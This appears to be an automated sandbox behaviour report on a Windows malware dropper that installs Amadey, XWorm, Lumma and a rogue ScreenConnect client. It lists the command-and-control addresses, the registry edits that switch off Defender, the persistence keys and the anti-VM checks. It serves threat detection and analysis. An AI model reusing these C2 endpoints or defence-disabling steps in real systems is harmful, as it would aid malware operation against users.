Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 09:36
Static task
static1
Behavioral task
behavioral1
Sample
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Resource
win7-20240903-en
General
-
Target
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
-
Size
3.1MB
-
MD5
74ba48529515c95320f4a86fc42fc668
-
SHA1
c33b2b0c5e43e5ac274206ae964cf85bb8718048
-
SHA256
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa
-
SHA512
16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8
-
SSDEEP
98304:XmP6PUaaDfBgWBPTrdEdsgxYC2JyLce9ebFyZgk6TR:XcqZexyV6T
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
87.120.112.33:8398
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
lumma
https://processhol.sbs/api
https://p10tgrace.sbs/api
https://peepburry828.sbs/api
https://3xp3cts1aim.sbs/api
https://p3ar11fter.sbs/api
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/5352-491-0x0000000000520000-0x00000000009A6000-memory.dmp family_xworm behavioral2/memory/5352-492-0x0000000000520000-0x00000000009A6000-memory.dmp family_xworm -
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection cedfdcc430.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" cedfdcc430.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" cedfdcc430.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" cedfdcc430.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cedfdcc430.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" cedfdcc430.exe -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5480c36033.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cedfdcc430.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ document.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3beeb94a45.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5800 powershell.exe 3500 powershell.exe 4984 powershell.exe 4980 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (e6cb77284cf765aa)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=5ed15620-6a10-4859-92e3-6289630ddee0&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAppIU89Zza02FmB%2bI4UVSKwAAAAACAAAAAAAQZgAAAAEAACAAAAAX26tRboxHYZUk8yEfqB85S2eb0C58%2bPwUjBGkaST9%2bgAAAAAOgAAAAAIAACAAAAAqdbhVzKToNIdsaa6q%2fBPlytNVk1wZFe89kI0nnh70lqAEAACR3rD64TLQzC4waEZZMPQskwRLV7ays8fkYhLAo0GOyCJ3kMR7DhsXYgbbd3ar1fSeN%2fW4YMhwiL3nbNaDmDy8ZHaK26u%2fNYQKOAnwG973xxzZVoaZqn5gTpz4erjayPdv5jg132tjuUtN5G4JGZK0fNkYdEbOxvmAaUxg9OECmqAloN7FzRZhktHc9u5Q%2fiTNolVY9cn8WPKtK77ImlMs%2bfhEL2c2bdQmkcPJqzKJDAORDGuUzupQs6vegutZjzeI4N5K9WRLzu%2fidA29aEdus%2bYJHhBmiBwPASHeY7rL0%2fGg5ksa4iAJQ9JqeIkVZXhb%2fBayuiZJHGkgf57ap%2bW5UYKgpQC0iwF7xtk%2bgitlVEGqmtIhSowAw54oM3U85Z9HgTRjIrXrT9NN1L9a%2bZqwAnvZyDH%2ftnG5x5jSW7APApaoTsT71G%2fTlgz25xlpY2nLvyCjFve5M37BN7g5JpJPgi6OkOp4n9m6bmyt7H2ykTVwn2YZcPL1ukXcR1weKnGJxltIx5s8YtPbSuBxiwNBmNq8LdPqwGoNI5T4hW6iMY7r0Do6nKCa5QnG7pAKBjx1pqSYQWMX2Vnt6SVFZ5n%2folko58dX8Mcl8TaFJkmrAqAu3ZW%2bH4PYSBa%2fxJ3skoCxMfwQjSMMsYRou9z86iNPDUUq%2f5MCAhWo5WsiOJWVQh84Y395KlqaHvyV%2fOHgEGpyl6oXxLEu5QwBM%2flzAtSRgX%2b83J4MdjfJ8kKlAadc%2bPk%2fKZtfR%2frXb7ALcGffvO7K2%2bs3goD9fH3LeWh9uaoaIgc04v%2bFF0ke6KCExrwVs4lxxTKANGhI5HvHfUwiJz61uHH%2bliTj4a3XFT0yV%2b3ido6zMDhXE%2fGHhb3KxMvy3xyGHVWEE9H7%2f56z%2fVOy%2fWLVx8r%2bDE3jdt21H7OfKeYFQZEBKkTTEVeZ4BBPqa84SDlwQXAwzJRsW8QUbujJnCEsUwtfjfLwXuEWq4tKcLXN7ubLI%2bltlwMZMCTlH9RTXq2etmvX2%2ft0o9tB3ieeJr6CQmr%2bnEcp2UaMBCahNqb%2b60gjFGBT957cQMHFuUmOaMywtShxaeh0f9U8vslOYCNHi7YMfeqQ9eirY9PYvuhOxu96LKP4IL3d0Li4jIXKbuRXhIHK9r9wB64kRn2B5tYGlS0RjKscvr70%2fs8tnw3wX0RgmL8R8qHbHFsHdK1%2bZH5bbQVaBKOAeE2uWfaNdSz4odPPIyNbRg15LgHO7HeAnPrZwZsJ%2fW85oqYh39YICHBzi%2fQFDdPOX8Llstcuv5auBkcudSVlrywZ%2b5O4sKPS0YzUeNjbpWwtmNquv%2ft%2fYmf6tzjZFf0HfoyPBL09s%2bu3TGLhO4gmuveuJjPLFHU3lUXMukHDsygTME2v8hZO9fRoOOncHOod%2ffnKNJDwF%2ff%2bcthuE%2bbYfAUBCK8VpkIHDTokxeD0TREiPtciG7%2fJCbYx6VBKfZ97KaMyVQVzNaCA6La5FVzNxGnT7ZNNf9TX9QhKd1Q93aLiFS%2bwd9zT8lsV5hjr%2bUQOP76NGp%2f1DshD%2bfEF42LRLx8w6akyLIufek7yUu0RF8O6GwRsLJdcQkAAAABvCZV2vjURhn3dNYqRj33RuboMdGiCUyvlImYk3Q7GNocWPG7djqV7YYW1hfCSSOm3DaPzmwTOdvDlS%2ftdUBHP&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cedfdcc430.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cedfdcc430.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3beeb94a45.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion document.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5480c36033.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3beeb94a45.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion document.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5480c36033.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation document.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation SupportClientSetup.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk document.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk document.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 14 IoCs
pid Process 4248 skotes.exe 4356 5480c36033.exe 1364 3beeb94a45.exe 4480 skotes.exe 3468 88de7f18a5.exe 1544 cedfdcc430.exe 5352 document.exe 4768 SupportClientSetup.exe 2432 ScreenConnect.ClientService.exe 3328 ScreenConnect.WindowsClient.exe 5096 ScreenConnect.WindowsClient.exe 5440 skotes.exe 848 ScreenConnect.WindowsClient.exe 5840 skotes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 5480c36033.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 3beeb94a45.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine cedfdcc430.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine document.exe -
Loads dropped DLL 22 IoCs
pid Process 1056 MsiExec.exe 5768 rundll32.exe 5768 rundll32.exe 5768 rundll32.exe 5768 rundll32.exe 5768 rundll32.exe 5768 rundll32.exe 5768 rundll32.exe 5768 rundll32.exe 5768 rundll32.exe 2196 MsiExec.exe 5260 MsiExec.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe 2432 ScreenConnect.ClientService.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features cedfdcc430.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" cedfdcc430.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5480c36033.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006867001\\5480c36033.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3beeb94a45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006868001\\3beeb94a45.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\88de7f18a5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006869001\\88de7f18a5.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cedfdcc430.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006870001\\cedfdcc430.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" document.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023cd1-71.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800650036006300620037003700320038003400630066003700360035006100610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\vg11xa01.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\vg11xa01.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 3776 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 4248 skotes.exe 4356 5480c36033.exe 1364 3beeb94a45.exe 4480 skotes.exe 1544 cedfdcc430.exe 5352 document.exe 5440 skotes.exe 5840 skotes.exe -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\system.config msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File created C:\Windows\Installer\e585ee6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI607A.tmp msiexec.exe File created C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}\DefaultIcon msiexec.exe File created C:\Windows\Installer\SourceHash{C65824D8-9903-AFB4-B430-141024FF968F} msiexec.exe File opened for modification C:\Windows\Installer\MSI6108.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\skotes.job 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe File opened for modification C:\Windows\Installer\e585ee4.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI6212.tmp msiexec.exe File created C:\Windows\Installer\wix{C65824D8-9903-AFB4-B430-141024FF968F}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\e585ee4.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3beeb94a45.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5480c36033.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cedfdcc430.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language document.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SupportClientSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88de7f18a5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001d4141155d34ac580000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001d4141150000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001d414115000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1d414115000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001d41411500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 4400 taskkill.exe 996 taskkill.exe 4696 taskkill.exe 2856 taskkill.exe 1912 taskkill.exe -
